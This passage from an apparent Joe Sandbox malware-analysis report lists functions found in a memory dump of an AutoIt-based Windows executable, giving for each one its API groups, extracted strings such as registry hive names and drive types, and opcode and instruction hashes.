                                                                          • Instruction Fuzzy Hash: 3B516976B2A641CFE750DF65E4406ADB7B1F748B88F809125EE4A53B28EF38D416CB10
                                                                          Function 00007FF7ADC6B0C4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                          • String ID: NULL Pointer assignment
                                                                          • API String ID: 2706829360-2785691316
                                                                          • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                          • Instruction ID: 6e5942b9583acd8b959db60286fe3b0714039ba0f10ba4474efb87f94bee6e9a
                                                                          • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                          • Instruction Fuzzy Hash: 4D514332B2AA128EEB40EF65D8456BCA771FB84B88FC25135DE0E47665EF39D046C350
                                                                          Function 00007FF7ADCA1110 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 371COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF7ADC9FD7B), ref: 00007FF7ADCA1143
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpper
                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                          • API String ID: 3964851224-909552448
                                                                          • Opcode ID: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                          • Instruction ID: 8bfecaad5a2a8271a52d5066a8df190814e9501b0254987f683566c77f548733
                                                                          • Opcode Fuzzy Hash: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                          • Instruction Fuzzy Hash: 12E17212F0FA5789EB606F6598502B9A292FF10B94BC64A31C95D477F4FE3CE9478320
                                                                          Function 00007FF7ADC887CC Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 200COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                          • String ID: *.*
                                                                          • API String ID: 4125642244-438819550
                                                                          • Opcode ID: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                          • Instruction ID: 79f71201afa1138ec4038e7413345fdb6085e12bd8a80a5b1a690b307fbe025d
                                                                          • Opcode Fuzzy Hash: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                          • Instruction Fuzzy Hash: 29817122A1DA8289EB50EF15E440AFDA360FF44B85FC50036DA4E47BA5EF78D646C720
                                                                          Function 00007FF7ADC7A40C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188windowsleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                          • String ID: P
                                                                          • API String ID: 1460738036-3110715001
                                                                          • Opcode ID: 6e2be1337fb57673dad59794737e60112838fe0b06465b145457b8a8f464ada3
                                                                          • Instruction ID: b02a61e60f7a13fe1d2b9299b4b4a7fc426d90f67af33601412a6b281c47ba12
                                                                          • Opcode Fuzzy Hash: 6e2be1337fb57673dad59794737e60112838fe0b06465b145457b8a8f464ada3
                                                                          • Instruction Fuzzy Hash: F3711722A0E6424EF761FF6494442BDA761FB44F48FD64031DA4E876A1EE7CE647CB20
                                                                          Function 00007FF7ADC015EC Relevance: 18.2, APIs: 12, Instructions: 191timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 1974058525-0
                                                                          • Opcode ID: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
                                                                          • Instruction ID: 821cdde644a4ce51b9773cb4e8b478116de72152303b943768f72f8f5ab3b826
                                                                          • Opcode Fuzzy Hash: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
                                                                          • Instruction Fuzzy Hash: 3E915021A1F70289EB54AF5598546B8E364FF88F84FDA4135D94E87275EF3CE842D320
                                                                          Function 00007FF7ADC72F78 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                          • String ID:
                                                                          • API String ID: 3096461208-0
                                                                          • Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                          • Instruction ID: 823044aad8dbef7bf52e1bf3b89c3edb27314d8b92026a30c4c53d1c857e2432
                                                                          • Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                          • Instruction Fuzzy Hash: 3761A172B192508FE714DF69E44466DB7A2F788B84F908139DE1993F58EF3CD9068B00
                                                                          Function 00007FF7ADC77E64 Relevance: 18.2, APIs: 12, Instructions: 173keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                          • Instruction ID: bd98bab5a2e48640591b6054fe88175ef14ed40ef7580becb4e8c6dc124daf71
                                                                          • Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                          • Instruction Fuzzy Hash: 9C71DC1261E2C14EFB75AB3094102B9AB61EF45B88FDA0039D68D037E1EE5DD947CB71
                                                                          Function 00007FF7ADC84708 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 339COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharDriveLowerTypewcscpy
                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                          • API String ID: 1561581874-1000479233
                                                                          • Opcode ID: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                          • Instruction ID: d9932ce49f3f02a965a1d48dccd8676e95d94522a600de966fbcf25653ce18e4
                                                                          • Opcode Fuzzy Hash: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                          • Instruction Fuzzy Hash: BFD1F322E0E69649EA20BB25D4406BDE3A2FB54B95FC24231D95D437B4FF3CE9478320
                                                                          Function 00007FF7ADC6FF44 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 243windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                          • String ID: %s%u
                                                                          • API String ID: 1412819556-679674701
                                                                          • Opcode ID: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                          • Instruction ID: 209a1c6b566f824c6c05211e8da860540615324ebd177d0a1ec77fe35c9261a4
                                                                          • Opcode Fuzzy Hash: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                          • Instruction Fuzzy Hash: 76B1D472B1E6829BEB19EB25D8046F9A7A0FB44B84FC10031DA19477A5EF3DE516CB10
                                                                          Function 00007FF7ADC6C034 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 124registryshareCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                          • API String ID: 3030280669-22481851
                                                                          • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                          • Instruction ID: 0c0448803c92e7608d94aa3396f973c6805ce04ea36286637f3cf4ece60d503d
                                                                          • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                          • Instruction Fuzzy Hash: 6B51A52261DA9299EB50EB64E8902EDB7A0FB84784FC14031EA4D47AB9FF3CD547C710
                                                                          Function 00007FF7ADCAAD1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                          • String ID: static
                                                                          • API String ID: 3821898125-2160076837
                                                                          • Opcode ID: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                          • Instruction ID: c47c6bfd4ad5885706c4ab8a7c69f0cba39558dabcd613cd4ef434e2f6f8de82
                                                                          • Opcode Fuzzy Hash: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                          • Instruction Fuzzy Hash: 83418E3261D7818BEB609F25E44475EB3A1FB88B90F904235DA9D47BA8DF3CD846CB10
                                                                          Function 00007FF7ADC6C858 Relevance: 16.7, APIs: 11, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                          • String ID:
                                                                          • API String ID: 1255039815-0
                                                                          • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                          • Instruction ID: 457222a7b354fc2f5649f3b73a7073032ac687d9cfa7ab7251a5de784643a2cb
                                                                          • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                          • Instruction Fuzzy Hash: D261E022B196518EEB00EFA1D8405BC7BB4FB44B88BD65035DE4E537A9EF39D846C320
                                                                          Function 00007FF7ADC77BA0 Relevance: 16.6, APIs: 11, Instructions: 106keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                          • Instruction ID: 0dde31b065dd6fd6bc7e383f97de8f1843c0493888ac0d2ad237cbb355f6306d
                                                                          • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                          • Instruction Fuzzy Hash: 9641B721E0D2D96FFFB1BB609400379AA91EB19744FCA4039C789031E1EE5DE8968B71
                                                                          Function 00007FF7ADC0E774 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 438COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00007FF7ADC06838: CreateFileW.KERNELBASE ref: 00007FF7ADC068A2
                                                                            • Part of subcall function 00007FF7ADC24380: GetCurrentDirectoryW.KERNEL32(?,00007FF7ADC0E817), ref: 00007FF7ADC2439C
                                                                            • Part of subcall function 00007FF7ADC056D4: GetFullPathNameW.KERNEL32(?,00007FF7ADC056C1,?,00007FF7ADC07A0C,?,?,?,00007FF7ADC0109E), ref: 00007FF7ADC056FF
                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7ADC0E8B0
                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7ADC0E9FA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                          • API String ID: 2207129308-1018226102
                                                                          • Opcode ID: 8c32c7fc769a1785a5cc8aaef85c2c091e9d514911a4bf18a656758b3ba076bf
                                                                          • Instruction ID: 1b6f3f1df0a17bde8c376fc4a066e0f32ad234214e11be3e333eafa78e39498d
                                                                          • Opcode Fuzzy Hash: 8c32c7fc769a1785a5cc8aaef85c2c091e9d514911a4bf18a656758b3ba076bf
                                                                          • Instruction Fuzzy Hash: 8712B422A1E6428AEB10FB65D4411FDE764FB84B44FC24131EA4E476B9EF7CE606C720
                                                                          Function 00007FF7ADC966B4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 182comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                          • API String ID: 636576611-1287834457
                                                                          • Opcode ID: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                          • Instruction ID: 19fc4c7536bf3ec1273f57aff315f10a696913f3a2dcd9a6b53c27ac0658417a
                                                                          • Opcode Fuzzy Hash: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                          • Instruction Fuzzy Hash: 52716122A4DA0689EB14AF26E4401BDA761FB44B98FC65431EE2E477B5FF38D446C360
                                                                          Function 00007FF7ADC92A18 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 174networkfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                          • String ID: 5$Ping
                                                                          • API String ID: 1486594354-1972892582
                                                                          • Opcode ID: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
                                                                          • Instruction ID: 76fd818a9617d0c7045b989266ac3ac66574ae73465c2488b69b48d338106aee
                                                                          • Opcode Fuzzy Hash: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
                                                                          • Instruction Fuzzy Hash: 37714F62A0E6428AEB20EB55D49037DE7A1FB84B90FD28431EA5D477A1FF7CD5428720
                                                                          Function 00007FF7ADC776D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 77windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
